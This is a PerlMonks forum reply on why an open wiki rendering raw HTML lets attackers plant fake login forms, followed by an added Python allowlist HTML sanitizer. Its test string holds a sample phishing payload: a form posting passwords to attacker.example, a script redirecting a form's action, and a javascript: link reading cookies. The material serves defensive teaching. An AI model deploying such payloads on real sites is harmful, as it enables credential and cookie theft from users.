PerlMonks
Re^5: RFC: self hosting Perl 6 string wiki
by moritz (Cardinal) on Sep 09, 2008 at 06:59 UTC [id://709985]
I think I wasn't very clear on the attack vector I thought about, let me try again.

When you have the power of displaying arbitrary HTML/JavaScript/CSS on a page, you can fake everything, including a login form for others to use that actually sends their login/password to your private server. Which basically means that you can get login data without compromising the server in some way.

> Stealers will eventually pass Parrodocs by because there's nothing worth stealing;

If you offer a service that you think is valuable or interesting, the "bad guys" will think the same. For example, many people use the same password on different services, so snooping passwords has a value on its own.

> This is a central issue. Do you think that the following can, at least in theory, work?

It can work, but only with the right attitude. When you think of it as a wiki which is rather open, I don't think it can. If you think of it as a CMS where only trusted persons get edit access, you might be more successful.
In Section: Meditations
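The fake-login-form attack moritz describes only works because the wiki renders contributor markup verbatim. As an added example that is not part of this thread or of the Perl 6 wiki under discussion, the Python below shows the server-side control that removes the attack: an allowlist sanitizer that keeps a few formatting tags, keeps `href` only for http(s) URLs, drops every other tag (including `<form>`, `<input>` and `<script>` with its body) and re-escapes all text. The allowlist contents, the `sanitize` name and the constructed payload are this example's own choices, not anything from the page.

```python
"""Allowlist HTML sanitizer for wiki page bodies (added example, not project code)."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed policy for this example: plain formatting plus http(s) links only.
ALLOWED_TAGS = {"b", "i", "em", "strong", "code", "p", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = {"http", "https"}
DROP_WITH_CONTENT = {"script", "style"}  # tag and its body both disappear


class WikiSanitizer(HTMLParser):
    """Re-serialises only allowlisted markup; everything else becomes inert text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropping = False  # True while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.dropping = True
            return
        if tag not in ALLOWED_TAGS:
            return  # <form>, <input>, <iframe>, ...: tag removed, inner text kept
        parts = [tag]
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # no onclick=, style=, etc.
            value = value or ""
            if name == "href" and urlparse(value).scheme.lower() not in SAFE_SCHEMES:
                continue  # blocks javascript:, data:, vbscript: links
            parts.append(f'{name}="{escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + ">")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.dropping = False
            return
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self.dropping:
            return
        # convert_charrefs decoded entities for us; re-escape so text stays text
        self.out.append(escape(data, quote=False))


def sanitize(wiki_html: str) -> str:
    """Return wiki_html reduced to allowlisted markup and escaped text."""
    parser = WikiSanitizer()
    parser.feed(wiki_html)
    parser.close()
    return "".join(parser.out)


# Constructed payload: the credential-stealing login form from the post,
# plus a script rewriting a real form's action and a javascript: link.
FAKE_LOGIN_PAGE = (
    "<p>Session expired, please <b>log in</b> again:</p>"
    '<form action="https://attacker.example/collect" method="post">'
    '<input name="user"><input name="pass" type="password">'
    '<input type="submit" value="Login"></form>'
    '<script>document.forms[0].action="https://attacker.example/c";</script>'
    '<a href="javascript:alert(document.cookie)">help</a>'
)

if __name__ == "__main__":
    print(sanitize(FAKE_LOGIN_PAGE))
```

The sanitizer drops unknown tags rather than escaping them, so a contributor's stray `<form>` simply vanishes instead of littering the page with `&lt;form&gt;`; if the wiki wanted to show such markup literally, it would escape the whole tag instead. Either way the attacker-controlled URL never reaches a browser as an active element.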